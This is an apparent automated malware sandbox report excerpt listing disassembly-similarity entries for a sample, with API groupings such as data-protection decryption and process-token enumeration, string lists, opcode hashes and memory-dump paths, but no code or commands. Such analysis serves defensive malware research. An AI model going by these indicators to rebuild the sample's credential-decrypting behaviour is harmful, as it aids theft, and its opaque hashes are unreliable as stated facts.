                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FormatInfoLocaleMessage
                                                                                                                                                                  • String ID: !x-sys-default-locale
                                                                                                                                                                  • API String ID: 4235545615-2729719199
                                                                                                                                                                  • Opcode ID: f19c835850623712fbca22d426e0c2013945c380ca8add72a55f3f09a2f97b50
                                                                                                                                                                  • Instruction ID: e29755c78191c892e4063edf2cbd81d5cc746230601ca638db426173a55cc139
                                                                                                                                                                  • Opcode Fuzzy Hash: f19c835850623712fbca22d426e0c2013945c380ca8add72a55f3f09a2f97b50
                                                                                                                                                                  • Instruction Fuzzy Hash: 8501B572B1879182F7218F22F4A87DE67A1F7A9788F548115DA4587F94CF3CC685CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1791019856-0
                                                                                                                                                                  • Opcode ID: 90d945be40b20d5b5a3c3d7ca8cbaa30e5ffd7f5627642ea07c20393f480da84
                                                                                                                                                                  • Instruction ID: 4e6c7aa2c7192810735cf5077512f04e7cf96e996a0b21408160b9c494892f87
                                                                                                                                                                  • Opcode Fuzzy Hash: 90d945be40b20d5b5a3c3d7ca8cbaa30e5ffd7f5627642ea07c20393f480da84
                                                                                                                                                                  • Instruction Fuzzy Hash: B6618B722086428AEB349F15E5D83ED73A1F7A4748F648169CBDAC3691DF38DE91C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                                                  • Opcode ID: 0fc81d44bec917c2802c26d4724ac6a513cb7d03bb6cf24fcfbb40603345bdc0
                                                                                                                                                                  • Instruction ID: 8ac3c099f5c5f541fb3729fba1d44c86bf33445a18795f66b301104404eda2c5
                                                                                                                                                                  • Opcode Fuzzy Hash: 0fc81d44bec917c2802c26d4724ac6a513cb7d03bb6cf24fcfbb40603345bdc0
                                                                                                                                                                  • Instruction Fuzzy Hash: C301A73030875086E7049F96B4882DEA760E7E5BD4F544426DE5983B56CE38CB818740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CryptDataFreeLocalUnprotect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1561624719-0
                                                                                                                                                                  • Opcode ID: 5e76940ea55d6452d0e0d141e06380e92f95219d88b70c13de166273a6d400fa
                                                                                                                                                                  • Instruction ID: 71abb662dd1b30f8f3cb8a7a6c041a5e1855296283bbf99820f4ddb349678f95
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e76940ea55d6452d0e0d141e06380e92f95219d88b70c13de166273a6d400fa
                                                                                                                                                                  • Instruction Fuzzy Hash: DC617D32B18B80DAF710DF74E4943DD73A1E76879CF048219EA8996E8ADF74CA94C344
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CryptDataFreeLocalProtect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2714945720-0
                                                                                                                                                                  • Opcode ID: 6da8b2380d1e6afdbe15ad09ed0a82a6e20629f9e1f2d0947d1afcdde56a6e99
                                                                                                                                                                  • Instruction ID: 4e6b2baf7cd0ddd3804d2e9b947410b9f6f7678b0f024ca44a3517a88a85aaf1
                                                                                                                                                                  • Opcode Fuzzy Hash: 6da8b2380d1e6afdbe15ad09ed0a82a6e20629f9e1f2d0947d1afcdde56a6e99
                                                                                                                                                                  • Instruction Fuzzy Hash: DC415A33618B90CAF3209F74D4943DD37A4F76878CF444629EA8846E8ADF79C6A4C354
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastValue$InfoLocale
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 673564084-0
                                                                                                                                                                  • Opcode ID: 1d8e405bb44b78bdea7029598407ccfb6a808eb35fd889ed9364ebfb982fc4a2
                                                                                                                                                                  • Instruction ID: 147d7e305ce27d9104314de68941d71e88b6b041f6b2dd2cea2bdc696ac2659c
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d8e405bb44b78bdea7029598407ccfb6a808eb35fd889ed9364ebfb982fc4a2
                                                                                                                                                                  • Instruction Fuzzy Hash: EC31A53230878186EF24CB29E8953DE73A1F7A8788F5081699A99C3695DF38DE51C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3029459697-0
                                                                                                                                                                  • Opcode ID: 58800bb6c4d0d9c609f2f6f306793987a7a581936cd52f064e9451565f60872b
                                                                                                                                                                  • Instruction ID: e2b3e2907dfd41a58d8ba3026a4f146650e91001dd7bd3b298e265506c664c69
                                                                                                                                                                  • Opcode Fuzzy Hash: 58800bb6c4d0d9c609f2f6f306793987a7a581936cd52f064e9451565f60872b
                                                                                                                                                                  • Instruction Fuzzy Hash: 8711D273A086448AEB149F26D0847DC7BA1F3A1BA8F544115D6A5833C4CE34CAD1C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$InfoLocaleValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3796814847-0
                                                                                                                                                                  • Opcode ID: a206680715a2a1e8ed04527063a7d486e32d99efc1662854cd7c3fa16e13c692
                                                                                                                                                                  • Instruction ID: a7633bee11c780ee12e2dff256cc97918534ff23481ef692cb18e8eb681080fb
                                                                                                                                                                  • Opcode Fuzzy Hash: a206680715a2a1e8ed04527063a7d486e32d99efc1662854cd7c3fa16e13c692
                                                                                                                                                                  • Instruction Fuzzy Hash: 90112C3272865183E7748727A0CCBDE6761E7A4768F644661D6A6877C4DF25CE82C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3029459697-0
                                                                                                                                                                  • Opcode ID: fd6ab9fb082eedb8b2c8f5dae22463227a7604b7e6560a2cecb061507bc0ecca
                                                                                                                                                                  • Instruction ID: fad03da4cdcfa09502dcc6f6a273bb0b7275356dcf09684850517a4fd12e1138
                                                                                                                                                                  • Opcode Fuzzy Hash: fd6ab9fb082eedb8b2c8f5dae22463227a7604b7e6560a2cecb061507bc0ecca
                                                                                                                                                                  • Instruction Fuzzy Hash: 4201D47270828097EB104F15E4C8BDDB7E2F760BA8F558261DAA1876C4CF748E82C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BlanketCreateInstanceProxy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1899829610-0
                                                                                                                                                                  • Opcode ID: 0fa0fe79c8acc086f796464e5f290d8fcb7c5bcb058d1267aeae24e9f7f4326f
                                                                                                                                                                  • Instruction ID: d87507681876db2b24b3a4e1253a62a94cf0b8c0f0c7efbb4dd4eac7549f27d2
                                                                                                                                                                  • Opcode Fuzzy Hash: 0fa0fe79c8acc086f796464e5f290d8fcb7c5bcb058d1267aeae24e9f7f4326f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6201D137708A508AFB22DFA4E4853ED67B0EB9875CF4001229E4D83A55EF38C685C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                  • Opcode ID: f8325550294e071d185dd7c07cc84b153cedbfbab89d167ada8b5b9da10e3d51
                                                                                                                                                                  • Instruction ID: 63321a302636f70afabc8f2b387334ac05bc47da2aabb947e69e0c0767c9f66c
                                                                                                                                                                  • Opcode Fuzzy Hash: f8325550294e071d185dd7c07cc84b153cedbfbab89d167ada8b5b9da10e3d51
                                                                                                                                                                  • Instruction Fuzzy Hash: D9F03C72308A4482E704DB15F8E42DD6765F7A8B84F549025EA59C3765CE3CCAA1C704
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                  • Opcode ID: 2bd217787b85c097b3ccba094d4d30ef76119dd789487d52041f712bc5b72eb7
                                                                                                                                                                  • Instruction ID: 3ad037031a616de12998af9563b124e6a9e129f975aa22664bad3ec5801933cb
                                                                                                                                                                  • Opcode Fuzzy Hash: 2bd217787b85c097b3ccba094d4d30ef76119dd789487d52041f712bc5b72eb7
                                                                                                                                                                  • Instruction Fuzzy Hash: F2B09230A07A15C6EA082B116CEA78C23A4BB68B24F884018840C91321DF3C12F59710
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4e13bd82e7ee77ee3b2ef3e8d158110f58128b3ce015c46648f9d69e17062f80
                                                                                                                                                                  • Instruction ID: 83c3267691511060dd51633115acea42e7dd2bd589a84d4cbcdbbada961e2038
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e13bd82e7ee77ee3b2ef3e8d158110f58128b3ce015c46648f9d69e17062f80
                                                                                                                                                                  • Instruction Fuzzy Hash: 01F07277A1D7F45AF3525B240CBE3CC1F91D7B2B2AF4D404A8A80C39D79C465E46D251
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d53a79903260b7a4f0e6c71e7ffc168a0f2adb2b336afcda935cdf6e025e0c2f
                                                                                                                                                                  • Instruction ID: f5b6d38d497468900124606725b727b05283dde5915bb2ff0873eb39ef22deba
                                                                                                                                                                  • Opcode Fuzzy Hash: d53a79903260b7a4f0e6c71e7ffc168a0f2adb2b336afcda935cdf6e025e0c2f
                                                                                                                                                                  • Instruction Fuzzy Hash: BBF0BDEBA5FEE006F7B699640DFE2CC2FD2D7F1519F1D418A8B44835C3AD422E845211
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 91d01cb9ed2bd3d2d45766b86e1c76849cdc335525e86e8d4b249a2a0640e502
                                                                                                                                                                  • Instruction ID: 28af43c7747f5b8feec384b703a9535bb63f8faae35d4f664999b6f70f13c951
                                                                                                                                                                  • Opcode Fuzzy Hash: 91d01cb9ed2bd3d2d45766b86e1c76849cdc335525e86e8d4b249a2a0640e502
                                                                                                                                                                  • Instruction Fuzzy Hash: A4E04F97A4DAE019F3164A600CFF68C1FD597B2A15B4D80DF874483AD3BC492D009311
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a42a01495bc10c92585e70db87d9dd7e84e2cd6d90333ee8a624f4433841b9f2
                                                                                                                                                                  • Instruction ID: 85ca7840941fed547db68210bb2e7a1d9016b595345f953d518d4155588ebe44
                                                                                                                                                                  • Opcode Fuzzy Hash: a42a01495bc10c92585e70db87d9dd7e84e2cd6d90333ee8a624f4433841b9f2
                                                                                                                                                                  • Instruction Fuzzy Hash: 2DA011A330C0A0CAF2030E20088EACC2BA0EBA2A00B8880808A0002803C02A088E8A00
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1dc2435066428a19c7aec6319df7f1f57b51b28dda39a8c99eefc1d21da70c48
                                                                                                                                                                  • Instruction ID: 4c7fc790ca0847b58c83a1901d8dc509d6f3932a6b06ec8e6bb04d93a9b1d0e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 1dc2435066428a19c7aec6319df7f1f57b51b28dda39a8c99eefc1d21da70c48
                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                  • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for char$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                                                  • API String ID: 909987262-3157939077
                                                                                                                                                                  • Opcode ID: b0a9f10bba544f87851a6c58a4d34eec66873fff2ac5d87bbd8ef3f653a33ebb
                                                                                                                                                                  • Instruction ID: 939558f37adb87897b53d2e9d6ab61d57ea70a13254bc66385b9c4f5e0567587
                                                                                                                                                                  • Opcode Fuzzy Hash: b0a9f10bba544f87851a6c58a4d34eec66873fff2ac5d87bbd8ef3f653a33ebb
                                                                                                                                                                  • Instruction Fuzzy Hash: 71114630A1A806EAF946F764F8995FCF6726FD1304FE309B1D16E424B2DD5EA906C720
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$Process32Token$InformationNextOpenProcess$ConvertCreateErrorFirstLastSnapshotStringToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3925315391-0
                                                                                                                                                                  • Opcode ID: 9cfa9a338c49679a1929b549c81fccef5f16dbb46e3a6c3e399b60bd0c466e0c
                                                                                                                                                                  • Instruction ID: 527adc026113efbb01191877c067448e9fefd8c110e2cda9df13499da0ec5d5d
                                                                                                                                                                  • Opcode Fuzzy Hash: 9cfa9a338c49679a1929b549c81fccef5f16dbb46e3a6c3e399b60bd0c466e0c
                                                                                                                                                                  • Instruction Fuzzy Hash: 97815132219B9082F750CF25E8987DEB3A5F798B98F404115EE8997BA9DF78CA45C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                  • String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid fill (too long).$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.$invalid fill character '{'
                                                                                                                                                                  • API String ID: 909987262-1289275417
                                                                                                                                                                  • Opcode ID: e298129272cf984188b5f565561c13e8c3fea883d1ff0d4dc2a58caec4d9f55b
                                                                                                                                                                  • Instruction ID: 8348a17933609154db078dfdbef7cb39a5446eaebe760c1fa272c964738ab3b6
                                                                                                                                                                  • Opcode Fuzzy Hash: e298129272cf984188b5f565561c13e8c3fea883d1ff0d4dc2a58caec4d9f55b
                                                                                                                                                                  • Instruction Fuzzy Hash: 73A1DB22A0E596D5FA62F725E4443B8B7A19B51B80FDB88B7D65D072F1CE6CE443C320
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.
                                                                                                                                                                  • API String ID: 909987262-3302395901
                                                                                                                                                                  • Opcode ID: 054b355c13716a2ad9edb178ab43f0c7c3b29c75f4ab9ff6280103ad86b6c9ba
                                                                                                                                                                  • Instruction ID: 3b36295cf8838f2115f1c3cb3498309db4abf2b8f22a724650c3e3e0d346f0c7
                                                                                                                                                                  • Opcode Fuzzy Hash: 054b355c13716a2ad9edb178ab43f0c7c3b29c75f4ab9ff6280103ad86b6c9ba
                                                                                                                                                                  • Instruction Fuzzy Hash: 6AB1F532B09A45DAF7229F64E0402FDB7B1EB08788F954236DB8D126A5DE3CE193C750
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 570795689-0
                                                                                                                                                                  • Opcode ID: 1e41568088f52e644b31898b0bd17a5a6d325f530ffdd94440ff6c92a5c92b21
                                                                                                                                                                  • Instruction ID: 555eccc02260d67eb8e6d6c8acdfb0d4a421baf86fa6dce5e917e44420ce07e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e41568088f52e644b31898b0bd17a5a6d325f530ffdd94440ff6c92a5c92b21
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D414B14B0B202E6F9AA7371F991039A1A15F44775FDB47B8D82E066F6ED2CF80B4721
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeaderImageNumbersVersion$HandleModule
                                                                                                                                                                  • String ID: .data$.mrdata$ntdll.dll
                                                                                                                                                                  • API String ID: 389246363-825320017
                                                                                                                                                                  • Opcode ID: ad4b1c0749fa3893729116aa8c799c12bbef0251717b69bc78c060cccdf372d6
                                                                                                                                                                  • Instruction ID: 84149ea5cf5bf3edaea00ffbd7c009c008548d7c0d5bcf5644998ef695fac633
                                                                                                                                                                  • Opcode Fuzzy Hash: ad4b1c0749fa3893729116aa8c799c12bbef0251717b69bc78c060cccdf372d6
                                                                                                                                                                  • Instruction Fuzzy Hash: 47917A32F06A11E9FB429B61E4442BDB3B1FB08B48F960476CE0D67A68DF3C9546C360
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
